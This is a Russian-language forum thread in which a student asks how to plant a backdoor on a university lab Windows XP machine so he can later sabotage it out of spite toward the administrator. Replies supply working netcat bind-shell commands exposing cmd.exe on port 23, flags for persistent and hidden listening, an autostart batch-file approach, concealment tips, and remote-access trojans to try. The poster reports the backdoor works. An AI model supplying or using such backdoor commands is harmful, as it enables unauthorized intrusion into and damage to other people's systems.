Просмотр полной версии : Help (срочно)
Народ как поднять на хосте (winХР) телнет на 23 порту если он выключен + поставить на него пас (ну можно и без паса на крайняк) через шелл консоль. (Сыжу на лабе в универе, хочу оставить себе дырочку, прибу домой наделаю им целую кучу всяких каках :). Админ такой кoзел!)
Срочно!! Спасибо заранее.
AkyHa_MaTaTa
13.12.2007, 13:35
Народ как поднять на хосте (winХР) телнет на 23 порту если он выключен
на выключеном компе тебе поможет поднять телнет только Бабка Агавья, либо очень много конопли, причем ты сможешь изменять там все включая sam файлы и тп, и ни какие антивирусы тебя не запалят.
Ну если серьезно можно поставить какой нибудь root kit, конечно в лабараторных кабинетах ты не под админом работаешь так что с руткитом могут быть проблемы.
igorf()x
13.12.2007, 17:58
Пуск - настройка - панель упраления -Администрирование - Службы - telnet=тип запуска"авто" + старт
Вариант 2: Установить Remote Administrator! ... только желательно стандартный порт изменить в его настройках....
на выключеном компе тебе поможет поднять телнет только Бабка Агавья
Этаже бабка тебя учила читать?
телнет на 23 порту если он выключен
если telnet - выключен!
If telnet - is switched off
Si telnet - est coupé
Wenn telnet - ausgeschaltet ist
Si telnet - es apagado
Блин, завтра еще лаба будеть :) Обьясняю ситуацию для тех кто не понял, я сделалл седе консоль с рутовыми правами (машина была все это время включена и не выключалась!), и хотелось бы поднять телнет. Но поднять его нада чепез консоль , т.к. доступа к админпанелы напрямую у меня нет.
"Вариант 2: Установить Remote Administrator! ... только желательно стандартный порт изменить в его настройках...."
Просто прямо на лабе замутил это все и под рукой ниче небыло(того же радмина), вот и хотел стандартными функциями обойтись...
AkyHa_MaTaTa я конечно понимаю, что моя репа говорит за себя, ну блин не на столько же я тормоз ЁЁЁЁЁпт!!
закинь батник в автозагрузку с запуском netcat (пусть запускается с прослушкой порта 23, но думаю сие надо творить под админскими права, хотя хз в вындоусе я не очень), может сработает..
"закинь батник в автозагрузку с запуском netcat (пусть запускается с прослушкой порта 23, но думаю сие надо творить под админскими права, хотя хз в вындоусе я не очень), может сработает.."
Чтото потипу этого: nc -vv -l -p23 ?
nc -l -n -e cmd.exe -v -p 23
помоему так
да, точно так, сейчас попробовал, а потом к серваку с помощью телнета на 23 порт коннект делай и выполняй комманды
Ух ты, рабоиает! Спасибки. Одно плохо, окно висит. Тут вот недпвно человек спрашивал можно ли запускать цмд в фоновом режиме, так никто ниче толком не ответил.
Scipio - с меня +. Спасибо.
ах да, поправочка небольшая если будешь использовать
nc -l -n -e cmd.exe -v -p 23
после закрытия соединения ты больше не подрубишься, в твоем случае надо так:
nc -L -n -e cmd.exe -v -p 23
заметь L большая обязательно
вобщем вот:
nc -L -d -n -e cmd.exe -v -p 23
так он не будет светится, т.е. окна не будет видно, как ты и хотел
если кто будет этот пример пользовать, незабудте удалить потом nc.exe с помощью диспетчера задач, а то любой сможет к вам подрубиться
а не проще порт поменять ) на какой -нить 31337 лол ) ну или хотяб 47981, ченить неприметное и название файла поменять наченить не бросающееся в глаза, ну кароче есть свои ньюансы, хотя способ не капитальный и ламирский :(
а не проще порт поменять ) на какой -нить 31337 лол ) ну или хотяб 47981, ченить неприметное и название файла поменять наченить не бросающееся в глаза, ну кароче есть свои ньюансы, хотя способ не капитальный и ламирский :(
а нахрена порт то менять и при чем здесь название то? какое название? cmd.exe? все тут нормально
никто в диспетчер задач не полезет, я так думаю, а окна видно все равно не будет
Ну если способ ламерский, посоветуй че нить по теме :)
RAT како-нить, типа radmin, netbus, bo2k :) если найдешь не палёвый
Remote Administrative Tool :) кажицо
мона спросить, а зачем именно телнет?
Я на лабе сидел когда задал этот вопрос. Ну небыло ничего под рукой, поднял рутовую консоль и хотел чтото сделать, исходя из подручных средств. Ну поскольку не успел, потяну ссобой в следуюющий раз какой нибудь бекдор :)
А по поводу телнета, ну раз уж спросил,- лишние знания не помешают, пригодится.
эт точно, так что сидя на лабе следует, как я думаю, занимаца лабой ))
Угу, здесь хакеры появились...))) до, круто, это не по ламерски, радмин, и иже с ними, куда нам против хенкеров!!! +++++, плюсенги за хенкерство
простиртуть, меня за ламерство, постараюсь так не делать больше, но вот по другому я не могу, в этом плане я девственик, вот еслиб ты для меня была бы первой... еще раз простиртуть...
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot